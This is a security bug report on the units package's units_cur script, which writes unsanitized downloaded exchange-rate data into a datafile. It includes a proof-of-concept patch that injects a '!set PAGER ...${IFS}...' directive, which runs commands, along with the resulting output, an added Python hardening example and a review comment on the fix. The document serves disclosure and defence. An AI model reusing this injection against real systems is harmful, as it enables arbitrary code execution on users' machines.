Package: units
Version: 2.17-1
Tags: security
units_cur does no sanitization of the data it downloads. Malicious
operators of the servers or man-in-the-middle attackers[*] could exploit
this to execute arbitrary code.
As a proof of concept, I patched units_cur to emulate Yahoo returning
malicious data. After updating the data, /var/lib/units/currency.units
looks like this:
southkoreawon 1|0
!set PAGER cowsay${IFS}pwned;exit;
# US$
And this happens:
$ units
Currency exchange rates from finance.yahoo.com on 2018-07-03
3048 units, 109 prefixes, 109 nonlinear units
You have: help kg
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
[*] Conveniently, all the data is downloaded over HTTP, so there's no
authentication.
--
Jakub Wilk
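Added example, not part of Jakub's report or of the units package: a minimal Python rendering of the unsanitized write beside a hardened one that accepts only a plain decimal price and re-emits it as a canonical number. The JSON shape (list -> resources -> resource -> fields) follows what units_cur reads; the `name 1|price US$` line template is inferred from the currency.units excerpt above, and the unit-name mapping and sample rates are constructed for the example.

```python
import re
from decimal import Decimal

# Constructed sample in the shape of the feed units_cur 2.17 parses
# (list -> resources -> resource -> fields). The second entry carries the
# payload from the bug report, where the price is a newline-separated
# units directive.
SAMPLE_RESOURCES = [
    {"resource": {"fields": {"name": "USD/KRW", "price": "1118.47"}}},
    {"resource": {"fields": {"name": "USD/EUR",
                             "price": "0\n!set PAGER cowsay${IFS}pwned;exit;\n#"}}},
]

# Assumed mapping from feed symbol to units name (constructed for the example).
UNIT_NAMES = {"USD/KRW": "southkoreawon", "USD/EUR": "euro"}

# Line template inferred from the currency.units excerpt in the report.
LINE_TEMPLATE = "{} 1|{} US$"


def format_line_unsafe(unit, price):
    # Mirrors the unsanitized behaviour: the downloaded string lands in the
    # datafile verbatim, newlines and all, so "0\n!set ..." becomes a directive.
    return LINE_TEMPLATE.format(unit, price)


# A price is accepted only if it is a plain non-negative decimal literal;
# a unit name only if it is a lowercase identifier. Nothing else can reach
# the datafile, so there is nothing to "escape".
_PRICE_RE = re.compile(r"^[0-9]+(\.[0-9]+)?$")
_UNIT_RE = re.compile(r"^[a-z][a-z0-9]*$")


def format_line_safe(unit, price):
    if not isinstance(unit, str) or not _UNIT_RE.match(unit):
        raise ValueError("bad unit name: %r" % (unit,))
    if not isinstance(price, str) or not _PRICE_RE.match(price):
        raise ValueError("bad price: %r" % (price,))
    value = Decimal(price)          # re-emit a canonical number, not raw bytes
    if value <= 0:
        raise ValueError("non-positive price: %r" % (price,))
    return LINE_TEMPLATE.format(unit, value)


def render_unsafe(resources):
    # What currency.units looks like when the feed is trusted blindly.
    lines = []
    for entry in resources:
        fields = entry["resource"]["fields"]
        lines.append(format_line_unsafe(UNIT_NAMES.get(fields["name"], ""),
                                        fields["price"]))
    return "\n".join(lines) + "\n"


def render_safe(resources):
    # Hardened rendering: bad entries are dropped and reported, never written.
    lines, rejected = [], []
    for entry in resources:
        fields = entry["resource"]["fields"]
        try:
            lines.append(format_line_safe(UNIT_NAMES.get(fields["name"], ""),
                                          fields["price"]))
        except ValueError:
            rejected.append(fields["name"])
    return "\n".join(lines) + "\n", rejected


def has_directive(text):
    # units treats a line starting with '!' in a datafile as a directive
    # (the report abuses "!set PAGER ..."); downloaded data must never
    # produce one, so this is a cheap post-write check.
    return any(line.startswith("!") for line in text.splitlines())


if __name__ == "__main__":
    print(render_unsafe(SAMPLE_RESOURCES))
    safe_text, dropped = render_safe(SAMPLE_RESOURCES)
    print(safe_text, "rejected:", dropped)
```

The point of validating with an allow-list and re-emitting through `Decimal` is that the units datafile has no quoting mechanism for arbitrary text, so stripping "dangerous" characters would be a losing game; only a value that is provably a number should be written.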
--- unpacked/usr/bin/units_cur 2018-06-26 23:03:38.000000000 +0200
+++ /usr/bin/units_cur 2018-07-03 18:43:02.089540024 +0200
@@ -279,6 +279,7 @@
'/allcurrencies/quote?format=json')
res.raise_for_status()
webdata = res.json()['list']['resources']
+ webdata[0]['resource']['fields']['price'] = '0\n!set PAGER cowsay${IFS}pwned;exit;\n#'
except requests.exceptions.RequestException as e:
stderr.write('Error connecting to currency server:\n{}.\n'.
format(e))
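Review bot: the injected `price` on the `+` line works because the string is later interpolated into currency.units unchecked, newlines included, and units honours a leading `!` on a datafile line as a directive; the fix belongs right after `webdata = res.json()['list']['resources']` and should reject any price that does not match a plain decimal (e.g. `^[0-9]+(\.[0-9]+)?$`) and any unit name that is not a bare identifier, dropping the entry with a warning rather than trying to strip characters, since the datafile format has no way to quote arbitrary text.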